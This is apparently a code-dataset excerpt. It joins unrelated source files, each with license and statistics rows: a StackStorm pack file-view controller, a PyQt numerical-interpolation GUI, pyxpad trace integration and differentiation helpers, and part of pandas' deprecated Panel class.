if "\0" in content[:1024]:
# Found null byte, most likely a binary file
return False
return True
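# Rough sketch of the heuristic above with hypothetical byte strings: plain text
# is kept, while content starting with a UTF-8 BOM or containing a null byte in
# its first 1024 bytes is treated as binary and skipped.
#   _include_file('notes.txt', 'plain text')                     -> True
#   _include_file('icon.png', codecs.BOM_UTF8 + 'rest of file')  -> False
#   _include_file('blob.bin', 'abc\0def')                        -> False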
class FileController(BaseFileController):
"""
Controller which allows user to retrieve content of a specific file in a pack.
"""
def get_one(self, ref_or_id, file_path, requester_user, if_none_match=None,
if_modified_since=None):
"""
Outputs the content of a specific file in a pack.
Handles requests:
GET /packs/views/file/<pack_ref_or_id>/<file path>
"""
pack_db = self._get_by_ref_or_id(ref_or_id=ref_or_id)
if not pack_db:
msg = 'Pack with ref_or_id "%s" does not exist' % (ref_or_id)
raise StackStormDBObjectNotFoundError(msg)
if not file_path:
raise ValueError('Missing file path')
pack_ref = pack_db.ref
# Note: Until list filtering is in place we don't require RBAC check for icon file
permission_type = PermissionType.PACK_VIEW
if file_path not in WHITELISTED_FILE_PATHS:
rbac_utils.assert_user_has_resource_db_permission(user_db=requester_user,
resource_db=pack_db,
permission_type=permission_type)
normalized_file_path = get_pack_file_abs_path(pack_ref=pack_ref, file_path=file_path)
if not normalized_file_path or not os.path.isfile(normalized_file_path):
# Ignore references to files which don't exist on disk
raise StackStormDBObjectNotFoundError('File "%s" not found' % (file_path))
file_size, file_mtime = self._get_file_stats(file_path=normalized_file_path)
response = Response()
if not self._is_file_changed(file_mtime,
if_none_match=if_none_match,
if_modified_since=if_modified_since):
response.status = http_client.NOT_MODIFIED
else:
if file_size is not None and file_size > MAX_FILE_SIZE:
msg = ('File %s exceeds maximum allowed file size (%s bytes)' %
(file_path, MAX_FILE_SIZE))
raise ValueError(msg)
content_type = mimetypes.guess_type(normalized_file_path)[0] or \
'application/octet-stream'
response.headers['Content-Type'] = content_type
response.body = self._get_file_content(file_path=normalized_file_path)
response.headers['Last-Modified'] = format_date_time(file_mtime)
response.headers['ETag'] = repr(file_mtime)
return response
def _is_file_changed(self, file_mtime, if_none_match=None, if_modified_since=None):
# For if_none_match check against what would be the ETAG value
if if_none_match:
return repr(file_mtime) != if_none_match
# For if_modified_since check against file_mtime
if if_modified_since:
return if_modified_since != format_date_time(file_mtime)
# Neither header is provided therefore assume file is changed.
return True
class PackViewsController(object):
files = FilesController()
file = FileController()
|
apache-2.0
| -378,968,515,113,438,460
| 35.00813
| 99
| 0.623166
| false
| 4.033698
| false
| false
| false
|
rafaelperazzo/iCalcNum
|
interpolacao.main.py
|
1
|
10021
|
# -*- coding: utf-8 -*-
import sys
import interpolacao as z
from interpolacaoUi import *
import numpy as np
import pylab as plt
from sympy import *
from PyQt4.QtGui import *
reload(sys)
sys.setdefaultencoding('utf8')
def str2list(texto):
resultado = map(float,texto.split())
if type(resultado) is list:
return True
else:
return False
def mensagem(tipo,titulo,texto,detalhes):
msg = QMessageBox()
if tipo==0:
msg.setIcon(QMessageBox.Information)
elif tipo==1:
msg.setIcon(QMessageBox.Warning)
elif tipo==2:
msg.setIcon(QMessageBox.Critical)
msg.setText(texto)
msg.setInformativeText(u'Informações adicionais')
msg.setWindowTitle(titulo)
msg.setDetailedText(detalhes)
msg.setStandardButtons(QMessageBox.Ok)
retval = msg.exec_()
def entradaValida():
input1 = False
input2 = False
input3 = False
input4 = False
input5 = False
if ui.txtX.text()!='':
input1 = True
if ui.txtY.text()!='':
input2 = True
if ui.txtPrecisao.text()!='':
input3 = True
if ui.txtPonto.text()!='':
input4 = True
if ui.txtQuantidade.text()!='':
input5 = True
try:
if not str2list(str(ui.txtX.text())):
input1 = False
if not str2list(str(ui.txtY.text())):
input2 = False
numerico = float(ui.txtPrecisao.text())
numerico = float(ui.txtPonto.text())
numerico = float(ui.txtQuantidade.text())
except ValueError as e:
input1 = False
if input1 and input2 and input3 and input4 and input5:
return True
else:
return False
def cmbMetodoChanged():
metodo = ui.cmbMetodo.currentIndex()
if metodo==0:
ui.txtPonto.setDisabled(True)
elif metodo==1:
ui.txtPonto.setDisabled(False)
elif metodo==2:
ui.txtPonto.setDisabled(False)
elif metodo==3:
ui.txtPonto.setDisabled(False)
#BUTTON CLICK HANDLER FUNCTION
def btnCalcularClick():
if entradaValida():
ui.txtResultado.clear()
eixoX = str(ui.txtX.text())
eixoX = map(float,eixoX.split())
eixoY = str(ui.txtY.text())
eixoY = map(float,eixoY.split())
precisao = int(ui.txtPrecisao.text())
if ui.cmbMetodo.currentIndex()==0: #LEAST SQUARES
resultado = z.minimosQuadrados(eixoX,eixoY,precisao)
ui.txtResultado.append('***************')
ui.txtResultado.append('a0')
ui.txtResultado.append('***************')
ui.txtResultado.append(str(resultado[0]))
ui.txtResultado.append('***************************')
ui.txtResultado.append(u'a1')
ui.txtResultado.append('***************************')
ui.txtResultado.append(str(resultado[1]))
ui.txtResultado.append('***************')
ui.txtResultado.append(u'Função')
ui.txtResultado.append('***************')
ui.txtResultado.append('f(x)= ' + str(resultado[2]))
elif ui.cmbMetodo.currentIndex()==1: #linear splines
ponto = float(ui.txtPonto.text())
resultado = z.splinesLineares(eixoX,eixoY,precisao,ponto)
ui.txtResultado.append('***************')
ui.txtResultado.append('Splines')
ui.txtResultado.append('***************')
ui.txtResultado.append(str(resultado[0]))
ui.txtResultado.append('***************************')
ui.txtResultado.append(u'Índice')
ui.txtResultado.append('***************************')
ui.txtResultado.append('Utilizando o spline: ' + str(resultado[1]+1))
ui.txtResultado.append('***************')
ui.txtResultado.append(u'Interpolação no ponto')
ui.txtResultado.append('***************')
ui.txtResultado.append('f(' + str(ponto) +')= ' + str(resultado[2]))
elif ui.cmbMetodo.currentIndex()==2: #LAGRANGE
ponto = float(ui.txtPonto.text())
resultado = z.lagrange(eixoX,eixoY,precisao,ponto)
ui.txtResultado.append('***************')
ui.txtResultado.append('Valor interpolado no ponto')
ui.txtResultado.append('***************')
ui.txtResultado.append(str(resultado[0]))
ui.txtResultado.append('***************************')
ui.txtResultado.append(u'Polinômio não simplificado')
ui.txtResultado.append('***************************')
ui.txtResultado.append('f(x)= ' + str(resultado[1]))
ui.txtResultado.append('***************')
ui.txtResultado.append('SIMPLIFICANDO')
ui.txtResultado.append('***************')
ui.txtResultado.append(pretty(resultado[2],use_unicode=True))
else: #DIVIDED DIFFERENCES
ponto = float(ui.txtPonto.text())
resultado = z.newton(eixoX,eixoY,precisao,ponto)
ui.txtResultado.append('***************')
ui.txtResultado.append(u'Diferenças divididas')
ui.txtResultado.append('***************')
ui.txtResultado.append(str(resultado[3]))
ui.txtResultado.append('***************')
ui.txtResultado.append('Valor interpolado no ponto')
ui.txtResultado.append('***************')
ui.txtResultado.append(str(resultado[0]))
ui.txtResultado.append('***************************')
ui.txtResultado.append(u'Polinômio não simplificado')
ui.txtResultado.append('***************************')
#expressao = sympify(resultado[1])
#expressao = pretty(expressao,use_unicode=False)
#print expressao
#ui.txtResultado.append(expressao)
ui.txtResultado.append('f(x)= ' + str(resultado[1]))
ui.txtResultado.append('***************')
ui.txtResultado.append('SIMPLIFICANDO')
ui.txtResultado.append('***************')
ui.txtResultado.append(pretty(resultado[2],use_unicode=True))
#print(resultado[3])
#print(resultado[1])
else:
#QMessageBox.critical(None,'Erro!',u'Entrada Inválida!',QMessageBox.Ok)
mensagem(2,u'Erro!',u'Entrada inválida!',u'Os dados de entrada devem ser numéricos!')
def btnVerGraficoClick():
btnCalcularClick()
eixoX = str(ui.txtX.text())
eixoX = map(float,eixoX.split())
eixoY = str(ui.txtY.text())
eixoY = map(float,eixoY.split())
precisao = int(ui.txtPrecisao.text())
if ui.cmbMetodo.currentIndex()==0:
funcao = z.minimosQuadrados(eixoX,eixoY,precisao)[2]
elif ui.cmbMetodo.currentIndex()==2:
funcao = z.lagrange(eixoX,eixoY,precisao,1)[2]
elif ui.cmbMetodo.currentIndex()==3:
funcao = z.newton(eixoX,eixoY,precisao,1)[2]
else:
ponto = float(ui.txtPonto.text())
resultado = z.splinesLineares(eixoX,eixoY,precisao,ponto)
indice = resultado[1]
funcao = resultado[0][indice]
#QMessageBox.information(None,u'Informação',u'Função ainda não disponível.',QMessageBox.Ok)
if ui.cmbMetodo.currentIndex()==1:
figure = plt.figure(1)
ax1 = figure.add_subplot(111)
ax1.axhline(linewidth=4,color="black")
ax1.axvline(linewidth=4,color="black")
plt.grid(True)
fx, = plt.plot(eixoX,eixoY, 'r',label='f(x)',color='k',linewidth=2.0)
#dx, = plt.plot(x,y2,'r', label='f\'(x)',color='k',linewidth=1.0)
plt.show()
else:
funcao = str(funcao)
x=np.linspace(min(eixoX),max(eixoX),100)
y2 = eval(funcao)
figure = plt.figure(1)
ax1 = figure.add_subplot(111)
ax1.axhline(linewidth=4,color="black")
ax1.axvline(linewidth=4,color="black")
plt.grid(True)
#plt.xlim(min(eixoX),max(eixoX))
#plt.ylim(min(eixoY),max(eixoY))
fx, = plt.plot(eixoX,eixoY, 'ro',label='f(x)',color='k',linewidth=2.0)
dx, = plt.plot(x,y2,'r', label='f\'(x)',color='k',linewidth=1.0)
plt.show()
#janela = Window(window,eixoX,eixoY,str(funcao))
#janela.setAttribute(QtCore.Qt.WA_DeleteOnClose,True)
#janela.exec_()
def sair():
quit()
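# btnAleatorioClick (below) fills the X/Y input fields with the requested
# number of unique random integer pairs, written as space-separated values.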
def btnAleatorioClick():
tamanho = int(ui.txtQuantidade.text())+1
listaX = []
listaY=[]
for i in range(1,tamanho,1):
x = np.random.randint(0,30)
y = np.random.randint(0,50)
while x in listaX:
x = np.random.randint(0,30)
while y in listaY:
y = np.random.randint(0,50)
listaX.append(x)
listaY.append(y)
lX = str(listaX)
lY = str(listaY)
lX = lX.replace('[','')
lX = lX.replace(',',' ')
lX = lX.replace(']','')
lY = lY.replace('[','')
lY = lY.replace(',',' ')
lY = lY.replace(']','')
ui.txtX.setText(lX)
ui.txtY.setText(lY)
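# salvar (below) opens a "Save As" dialog and writes the X data, the Y data
# and the textual results to the chosen file.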
def salvar():
fileName = QFileDialog.getSaveFileName(None, "Salvar Como")
if (fileName!=''):
f = open(fileName,'w')
resultado = str(ui.txtX.text()) + '\n' + str(ui.txtY.text()) + '\n'
resultado = resultado + str(ui.txtResultado.toPlainText()) + '\n'
f.write(resultado)
f.close()
#STARTING THE APPLICATION
app = QApplication(sys.argv)
#CREATING THE MAIN WINDOW
window = QMainWindow()
ui = Ui_interpolacaoPrincipal()
ui.setupUi(window)
#CONNECTING BUTTON CLICKS TO THE FUNCTIONS ABOVE
ui.btnCalcular.clicked.connect(btnCalcularClick)
ui.btnGrafico.clicked.connect(btnVerGraficoClick)
ui.btnAleatorios.clicked.connect(btnAleatorioClick)
#ui.actionSair.triggered.connect(sair)
ui.cmbMetodo.currentIndexChanged.connect(cmbMetodoChanged)
ui.actionSalvarComo.triggered.connect(salvar)
window.show()
sys.exit(app.exec_())
|
gpl-3.0
| 3,902,660,676,013,172,000
| 36.732075
| 99
| 0.563256
| false
| 3.112045
| false
| false
| false
|
bendudson/pyxpad
|
pyxpad/calculus.py
|
1
|
1993
|
"""
Calculus on XPadDataItem objects
"""
from .pyxpad_utils import XPadDataItem
from numpy import zeros, cumsum
def integrate(item):
"""
Integrate the given trace
Inputs
------
item - an XPadDataItem object (or equivalent)
Returns
-------
an XPadDataItem object
"""
if len(item.dim) != 1:
raise ValueError("Can only integrate 1D traces currently")
# Create a result
result = XPadDataItem()
if item.name != "":
result.name = "INTG( "+item.name+" )"
result.source = item.source
if item.label != "":
result.label = "INTG( "+item.label+" )"
if item.units != "":
result.units = item.units+"*"+item.dim[0].units
result.data = zeros(item.data.shape)
time = item.dim[0].data
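# Cumulative trapezoidal rule: each output sample adds
# 0.5*(t[i]-t[i-1])*(f[i]+f[i-1]) to the running sum; result.data[0] stays 0
# from the zeros() initialisation above.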
result.data[1:] = cumsum(0.5*(time[1:]-time[0:-1])*(item.data[1:] + item.data[0:-1]))
result.dim = item.dim
result.order = item.order
result.time = item.time
return result
def differentiate(item):
"""
Differentiates the given trace
Inputs
------
item - an XPadDataItem object (or equivalent)
Returns
-------
an XPadDataItem object
"""
if len(item.dim) != 1:
raise ValueError("Can only differentiate 1D traces")
# Create a result
result = XPadDataItem()
if item.name != "":
result.name = "Diff(" + item.name + ")"
result.source = item.source
if item.label != "":
result.label = "Diff(" + item.label + ")"
if item.units != "":
result.units = item.units + item.dim[0].units + chr(0x207B) + chr(0x00B9)
result.dim = item.dim
result.order = item.order
result.time = item.time
time = item.dim[item.order].data
result.data = zeros(len(item.data))
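# Central differences for the interior points; the two endpoints are then
# copied from their nearest interior neighbour, a first-order one-sided
# approximation.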
for i in range(1, len(result.data)-1):
result.data[i] = (item.data[i+1]-item.data[i-1])/(time[i+1]-time[i-1])
result.data[-1] = result.data[-2]
result.data[0] = result.data[1]
return result
|
gpl-3.0
| -439,367,664,206,884,740
| 20.202128
| 89
| 0.583041
| false
| 3.34396
| false
| false
| false
|
GuessWhoSamFoo/pandas
|
pandas/core/panel.py
|
1
|
55911
|
"""
Contains data structures designed for manipulating panel (3-dimensional) data
"""
# pylint: disable=E1103,W0231,W0212,W0621
from __future__ import division
import warnings
import numpy as np
import pandas.compat as compat
from pandas.compat import OrderedDict, map, range, u, zip
from pandas.compat.numpy import function as nv
from pandas.util._decorators import Appender, Substitution, deprecate_kwarg
from pandas.util._validators import validate_axis_style_args
from pandas.core.dtypes.cast import (
cast_scalar_to_array, infer_dtype_from_scalar, maybe_cast_item)
from pandas.core.dtypes.common import (
is_integer, is_list_like, is_scalar, is_string_like)
from pandas.core.dtypes.missing import notna
import pandas.core.common as com
from pandas.core.frame import DataFrame
from pandas.core.generic import NDFrame, _shared_docs
from pandas.core.index import (
Index, MultiIndex, _get_objs_combined_axis, ensure_index)
import pandas.core.indexes.base as ibase
from pandas.core.indexing import maybe_droplevels
from pandas.core.internals import (
BlockManager, create_block_manager_from_arrays,
create_block_manager_from_blocks)
import pandas.core.ops as ops
from pandas.core.reshape.util import cartesian_product
from pandas.core.series import Series
from pandas.io.formats.printing import pprint_thing
_shared_doc_kwargs = dict(
axes='items, major_axis, minor_axis',
klass="Panel",
axes_single_arg="{0, 1, 2, 'items', 'major_axis', 'minor_axis'}",
optional_mapper='', optional_axis='', optional_labels='')
_shared_doc_kwargs['args_transpose'] = (
"three positional arguments: each one of\n{ax_single}".format(
ax_single=_shared_doc_kwargs['axes_single_arg']))
def _ensure_like_indices(time, panels):
"""
Makes sure that time and panels are conformable.
"""
n_time = len(time)
n_panel = len(panels)
u_panels = np.unique(panels) # this sorts!
u_time = np.unique(time)
if len(u_time) == n_time:
time = np.tile(u_time, len(u_panels))
if len(u_panels) == n_panel:
panels = np.repeat(u_panels, len(u_time))
return time, panels
def panel_index(time, panels, names=None):
"""
Returns a multi-index suitable for a panel-like DataFrame.
Parameters
----------
time : array-like
Time index, does not have to repeat
panels : array-like
Panel index, does not have to repeat
names : list, optional
List containing the names of the indices
Returns
-------
multi_index : MultiIndex
Time index is the first level, the panels are the second level.
Examples
--------
>>> years = range(1960,1963)
>>> panels = ['A', 'B', 'C']
>>> panel_idx = panel_index(years, panels)
>>> panel_idx
MultiIndex([(1960, 'A'), (1961, 'A'), (1962, 'A'), (1960, 'B'),
(1961, 'B'), (1962, 'B'), (1960, 'C'), (1961, 'C'),
(1962, 'C')], dtype=object)
or
>>> years = np.repeat(range(1960,1963), 3)
>>> panels = np.tile(['A', 'B', 'C'], 3)
>>> panel_idx = panel_index(years, panels)
>>> panel_idx
MultiIndex([(1960, 'A'), (1960, 'B'), (1960, 'C'), (1961, 'A'),
(1961, 'B'), (1961, 'C'), (1962, 'A'), (1962, 'B'),
(1962, 'C')], dtype=object)
"""
if names is None:
names = ['time', 'panel']
time, panels = _ensure_like_indices(time, panels)
return MultiIndex.from_arrays([time, panels], sortorder=None, names=names)
class Panel(NDFrame):
"""
Represents wide format panel data, stored as 3-dimensional array.
.. deprecated:: 0.20.0
The recommended way to represent 3-D data are with a MultiIndex on a
DataFrame via the :attr:`~Panel.to_frame()` method or with the
`xarray package <http://xarray.pydata.org/en/stable/>`__.
Pandas provides a :attr:`~Panel.to_xarray()` method to automate this
conversion.
Parameters
----------
data : ndarray (items x major x minor), or dict of DataFrames
items : Index or array-like
axis=0
major_axis : Index or array-like
axis=1
minor_axis : Index or array-like
axis=2
copy : boolean, default False
Copy data from inputs. Only affects DataFrame / 2d ndarray input
dtype : dtype, default None
Data type to force, otherwise infer
"""
@property
def _constructor(self):
return type(self)
_constructor_sliced = DataFrame
def __init__(self, data=None, items=None, major_axis=None, minor_axis=None,
copy=False, dtype=None):
# deprecation GH13563
warnings.warn("\nPanel is deprecated and will be removed in a "
"future version.\nThe recommended way to represent "
"these types of 3-dimensional data are with a "
"MultiIndex on a DataFrame, via the "
"Panel.to_frame() method\n"
"Alternatively, you can use the xarray package "
"http://xarray.pydata.org/en/stable/.\n"
"Pandas provides a `.to_xarray()` method to help "
"automate this conversion.\n",
FutureWarning, stacklevel=3)
self._init_data(data=data, items=items, major_axis=major_axis,
minor_axis=minor_axis, copy=copy, dtype=dtype)
def _init_data(self, data, copy, dtype, **kwargs):
"""
Generate ND initialization; axes are passed
as required objects to __init__.
"""
if data is None:
data = {}
if dtype is not None:
dtype = self._validate_dtype(dtype)
passed_axes = [kwargs.pop(a, None) for a in self._AXIS_ORDERS]
if kwargs:
raise TypeError('_init_data() got an unexpected keyword '
'argument "{0}"'.format(list(kwargs.keys())[0]))
axes = None
if isinstance(data, BlockManager):
if com._any_not_none(*passed_axes):
axes = [x if x is not None else y
for x, y in zip(passed_axes, data.axes)]
mgr = data
elif isinstance(data, dict):
mgr = self._init_dict(data, passed_axes, dtype=dtype)
copy = False
dtype = None
elif isinstance(data, (np.ndarray, list)):
mgr = self._init_matrix(data, passed_axes, dtype=dtype, copy=copy)
copy = False
dtype = None
elif is_scalar(data) and com._all_not_none(*passed_axes):
values = cast_scalar_to_array([len(x) for x in passed_axes],
data, dtype=dtype)
mgr = self._init_matrix(values, passed_axes, dtype=values.dtype,
copy=False)
copy = False
else: # pragma: no cover
raise ValueError('Panel constructor not properly called!')
NDFrame.__init__(self, mgr, axes=axes, copy=copy, dtype=dtype)
def _init_dict(self, data, axes, dtype=None):
haxis = axes.pop(self._info_axis_number)
# prefilter if haxis passed
if haxis is not None:
haxis = ensure_index(haxis)
data = OrderedDict((k, v)
for k, v in compat.iteritems(data)
if k in haxis)
else:
keys = com.dict_keys_to_ordered_list(data)
haxis = Index(keys)
for k, v in compat.iteritems(data):
if isinstance(v, dict):
data[k] = self._constructor_sliced(v)
# extract axis for remaining axes & create the slicemap
raxes = [self._extract_axis(self, data, axis=i) if a is None else a
for i, a in enumerate(axes)]
raxes_sm = self._extract_axes_for_slice(self, raxes)
# shallow copy
arrays = []
haxis_shape = [len(a) for a in raxes]
for h in haxis:
v = values = data.get(h)
if v is None:
values = np.empty(haxis_shape, dtype=dtype)
values.fill(np.nan)
elif isinstance(v, self._constructor_sliced):
d = raxes_sm.copy()
d['copy'] = False
v = v.reindex(**d)
if dtype is not None:
v = v.astype(dtype)
values = v.values
arrays.append(values)
return self._init_arrays(arrays, haxis, [haxis] + raxes)
def _init_arrays(self, arrays, arr_names, axes):
return create_block_manager_from_arrays(arrays, arr_names, axes)
@classmethod
def from_dict(cls, data, intersect=False, orient='items', dtype=None):
"""
Construct Panel from dict of DataFrame objects.
Parameters
----------
data : dict
{field : DataFrame}
intersect : boolean
Intersect indexes of input DataFrames
orient : {'items', 'minor'}, default 'items'
The "orientation" of the data. If the keys of the passed dict
should be the items of the result panel, pass 'items'
(default). Otherwise if the columns of the values of the passed
DataFrame objects should be the items (which in the case of
mixed-dtype data you should do), instead pass 'minor'
dtype : dtype, default None
Data type to force, otherwise infer
Returns
-------
Panel
"""
from collections import defaultdict
orient = orient.lower()
if orient == 'minor':
new_data = defaultdict(OrderedDict)
for col, df in compat.iteritems(data):
for item, s in compat.iteritems(df):
new_data[item][col] = s
data = new_data
elif orient != 'items': # pragma: no cover
raise ValueError('Orientation must be one of {items, minor}.')
d = cls._homogenize_dict(cls, data, intersect=intersect, dtype=dtype)
ks = list(d['data'].keys())
if not isinstance(d['data'], OrderedDict):
ks = list(sorted(ks))
d[cls._info_axis_name] = Index(ks)
return cls(**d)
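# Illustrative sketch (not part of the original source, names are
# hypothetical): with two equally shaped DataFrames df_a and df_b,
#     Panel.from_dict({'A': df_a, 'B': df_b})
# builds a Panel whose items axis is ['A', 'B']; passing orient='minor'
# instead makes the DataFrames' columns the items.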
def __getitem__(self, key):
key = com.apply_if_callable(key, self)
if isinstance(self._info_axis, MultiIndex):
return self._getitem_multilevel(key)
if not (is_list_like(key) or isinstance(key, slice)):
return super(Panel, self).__getitem__(key)
return self.loc[key]
def _getitem_multilevel(self, key):
info = self._info_axis
loc = info.get_loc(key)
if isinstance(loc, (slice, np.ndarray)):
new_index = info[loc]
result_index = maybe_droplevels(new_index, key)
slices = [loc] + [slice(None)] * (self._AXIS_LEN - 1)
new_values = self.values[slices]
d = self._construct_axes_dict(self._AXIS_ORDERS[1:])
d[self._info_axis_name] = result_index
result = self._constructor(new_values, **d)
return result
else:
return self._get_item_cache(key)
def _init_matrix(self, data, axes, dtype=None, copy=False):
values = self._prep_ndarray(self, data, copy=copy)
if dtype is not None:
try:
values = values.astype(dtype)
except Exception:
raise ValueError('failed to cast to '
'{datatype}'.format(datatype=dtype))
shape = values.shape
fixed_axes = []
for i, ax in enumerate(axes):
if ax is None:
ax = ibase.default_index(shape[i])
else:
ax = ensure_index(ax)
fixed_axes.append(ax)
return create_block_manager_from_blocks([values], fixed_axes)
# ----------------------------------------------------------------------
# Comparison methods
def _compare_constructor(self, other, func):
if not self._indexed_same(other):
raise Exception('Can only compare identically-labeled '
'same type objects')
new_data = {col: func(self[col], other[col])
for col in self._info_axis}
d = self._construct_axes_dict(copy=False)
return self._constructor(data=new_data, **d)
# ----------------------------------------------------------------------
# Magic methods
def __unicode__(self):
"""
Return a string representation for a particular Panel.
Invoked by unicode(df) in py2 only.
Yields a Unicode String in both py2/py3.
"""
class_name = str(self.__class__)
dims = u('Dimensions: {dimensions}'.format(dimensions=' x '.join(
["{shape} ({axis})".format(shape=shape, axis=axis) for axis, shape
in zip(self._AXIS_ORDERS, self.shape)])))
def axis_pretty(a):
v = getattr(self, a)
if len(v) > 0:
return u('{ax} axis: {x} to {y}'.format(ax=a.capitalize(),
x=pprint_thing(v[0]),
y=pprint_thing(v[-1])))
else:
return u('{ax} axis: None'.format(ax=a.capitalize()))
output = '\n'.join(
[class_name, dims] + [axis_pretty(a) for a in self._AXIS_ORDERS])
return output
def _get_plane_axes_index(self, axis):
"""
Get the plane axes indexes: these are already reduced by one
dimension (compared with higher-level planes), since a
DataFrame's axes indexes are returned.
"""
axis_name = self._get_axis_name(axis)
if axis_name == 'major_axis':
index = 'minor_axis'
columns = 'items'
if axis_name == 'minor_axis':
index = 'major_axis'
columns = 'items'
elif axis_name == 'items':
index = 'major_axis'
columns = 'minor_axis'
return index, columns
def _get_plane_axes(self, axis):
"""
Get the plane axes: these are already reduced by one dimension
(compared with higher-level planes), since DataFrame axes are
returned.
"""
return [self._get_axis(axi)
for axi in self._get_plane_axes_index(axis)]
fromDict = from_dict
def to_sparse(self, *args, **kwargs):
"""
NOT IMPLEMENTED: do not call this method, as sparsifying is not
supported for Panel objects and will raise an error.
Convert to SparsePanel.
"""
raise NotImplementedError("sparsifying is not supported "
"for Panel objects")
def to_excel(self, path, na_rep='', engine=None, **kwargs):
"""
Write each DataFrame in Panel to a separate excel sheet.
Parameters
----------
path : string or ExcelWriter object
File path or existing ExcelWriter
na_rep : string, default ''
Missing data representation
engine : string, default None
write engine to use - you can also set this via the options
``io.excel.xlsx.writer``, ``io.excel.xls.writer``, and
``io.excel.xlsm.writer``.
Other Parameters
----------------
float_format : string, default None
Format string for floating point numbers
cols : sequence, optional
Columns to write
header : boolean or list of string, default True
Write out column names. If a list of string is given it is
assumed to be aliases for the column names
index : boolean, default True
Write row names (index)
index_label : string or sequence, default None
Column label for index column(s) if desired. If None is given, and
`header` and `index` are True, then the index names are used. A
sequence should be given if the DataFrame uses MultiIndex.
startrow : upper left cell row to dump data frame
startcol : upper left cell column to dump data frame
Notes
-----
Keyword arguments (and na_rep) are passed to the ``to_excel`` method
for each DataFrame written.
"""
from pandas.io.excel import ExcelWriter
if isinstance(path, compat.string_types):
writer = ExcelWriter(path, engine=engine)
else:
writer = path
kwargs['na_rep'] = na_rep
for item, df in self.iteritems():
name = str(item)
df.to_excel(writer, name, **kwargs)
writer.save()
def as_matrix(self):
self._consolidate_inplace()
return self._data.as_array()
# ----------------------------------------------------------------------
# Getting and setting elements
def get_value(self, *args, **kwargs):
"""
Quickly retrieve single value at (item, major, minor) location.
.. deprecated:: 0.21.0
Please use .at[] or .iat[] accessors.
Parameters
----------
item : item label (panel item)
major : major axis label (panel item row)
minor : minor axis label (panel item column)
takeable : interpret the passed labels as indexers, default False
Returns
-------
value : scalar value
"""
warnings.warn("get_value is deprecated and will be removed "
"in a future release. Please use "
".at[] or .iat[] accessors instead", FutureWarning,
stacklevel=2)
return self._get_value(*args, **kwargs)
def _get_value(self, *args, **kwargs):
nargs = len(args)
nreq = self._AXIS_LEN
# require an arg for each axis
if nargs != nreq:
raise TypeError('There must be an argument for each axis, you gave'
' {0} args, but {1} are required'.format(nargs,
nreq))
takeable = kwargs.pop('takeable', None)
if kwargs:
raise TypeError('get_value() got an unexpected keyword '
'argument "{0}"'.format(list(kwargs.keys())[0]))
if takeable is True:
lower = self._iget_item_cache(args[0])
else:
lower = self._get_item_cache(args[0])
return lower._get_value(*args[1:], takeable=takeable)
_get_value.__doc__ = get_value.__doc__
def set_value(self, *args, **kwargs):
"""
Quickly set single value at (item, major, minor) location.
.. deprecated:: 0.21.0
Please use .at[] or .iat[] accessors.
Parameters
----------
item : item label (panel item)
major : major axis label (panel item row)
minor : minor axis label (panel item column)
value : scalar
takeable : interpret the passed labels as indexers, default False
Returns
-------
panel : Panel
If label combo is contained, will be reference to calling Panel,
otherwise a new object
"""
warnings.warn("set_value is deprecated and will be removed "
"in a future release. Please use "
".at[] or .iat[] accessors instead", FutureWarning,
stacklevel=2)
return self._set_value(*args, **kwargs)
def _set_value(self, *args, **kwargs):
# require an arg for each axis and the value
nargs = len(args)
nreq = self._AXIS_LEN + 1
if nargs != nreq:
raise TypeError('There must be an argument for each axis plus the '
'value provided, you gave {0} args, but {1} are '
'required'.format(nargs, nreq))
takeable = kwargs.pop('takeable', None)
if kwargs:
raise TypeError('set_value() got an unexpected keyword '
'argument "{0}"'.format(list(kwargs.keys())[0]))
try:
if takeable is True:
lower = self._iget_item_cache(args[0])
else:
lower = self._get_item_cache(args[0])
lower._set_value(*args[1:], takeable=takeable)
return self
except KeyError:
axes = self._expand_axes(args)
d = self._construct_axes_dict_from(self, axes, copy=False)
result = self.reindex(**d)
args = list(args)
likely_dtype, args[-1] = infer_dtype_from_scalar(args[-1])
made_bigger = not np.array_equal(axes[0], self._info_axis)
# how to make this logic simpler?
if made_bigger:
maybe_cast_item(result, args[0], likely_dtype)
return result._set_value(*args)
_set_value.__doc__ = set_value.__doc__
def _box_item_values(self, key, values):
if self.ndim == values.ndim:
result = self._constructor(values)
# a dup selection will yield a full ndim
if result._get_axis(0).is_unique:
result = result[key]
return result
d = self._construct_axes_dict_for_slice(self._AXIS_ORDERS[1:])
return self._constructor_sliced(values, **d)
def __setitem__(self, key, value):
key = com.apply_if_callable(key, self)
shape = tuple(self.shape)
if isinstance(value, self._constructor_sliced):
value = value.reindex(
**self._construct_axes_dict_for_slice(self._AXIS_ORDERS[1:]))
mat = value.values
elif isinstance(value, np.ndarray):
if value.shape != shape[1:]:
raise ValueError('shape of value must be {0}, shape of given '
'object was {1}'.format(
shape[1:], tuple(map(int, value.shape))))
mat = np.asarray(value)
elif is_scalar(value):
mat = cast_scalar_to_array(shape[1:], value)
else:
raise TypeError('Cannot set item of '
'type: {dtype!s}'.format(dtype=type(value)))
mat = mat.reshape(tuple([1]) + shape[1:])
NDFrame._set_item(self, key, mat)
def _unpickle_panel_compat(self, state): # pragma: no cover
"""
Unpickle the panel.
"""
from pandas.io.pickle import _unpickle_array
_unpickle = _unpickle_array
vals, items, major, minor = state
items = _unpickle(items)
major = _unpickle(major)
minor = _unpickle(minor)
values = _unpickle(vals)
wp = Panel(values, items, major, minor)
self._data = wp._data
def conform(self, frame, axis='items'):
"""
Conform input DataFrame to align with chosen axis pair.
Parameters
----------
frame : DataFrame
axis : {'items', 'major', 'minor'}
Axis the input corresponds to. E.g., if axis='major', then
the frame's columns would be items, and the index would be
values of the minor axis
Returns
-------
DataFrame
"""
axes = self._get_plane_axes(axis)
return frame.reindex(**self._extract_axes_for_slice(self, axes))
def head(self, n=5):
raise NotImplementedError
def tail(self, n=5):
raise NotImplementedError
def round(self, decimals=0, *args, **kwargs):
"""
Round each value in Panel to a specified number of decimal places.
.. versionadded:: 0.18.0
Parameters
----------
decimals : int
Number of decimal places to round to (default: 0).
If decimals is negative, it specifies the number of
positions to the left of the decimal point.
Returns
-------
Panel object
See Also
--------
numpy.around
"""
nv.validate_round(args, kwargs)
if is_integer(decimals):
result = np.apply_along_axis(np.round, 0, self.values)
return self._wrap_result(result, axis=0)
raise TypeError("decimals must be an integer")
def _needs_reindex_multi(self, axes, method, level):
"""
Don't allow a multi reindex on Panel or above ndim.
"""
return False
def align(self, other, **kwargs):
raise NotImplementedError
def dropna(self, axis=0, how='any', inplace=False):
"""
Drop 2D slices from the panel, holding the passed axis constant.
Parameters
----------
axis : int, default 0
Axis to hold constant. E.g. axis=1 will drop major_axis entries
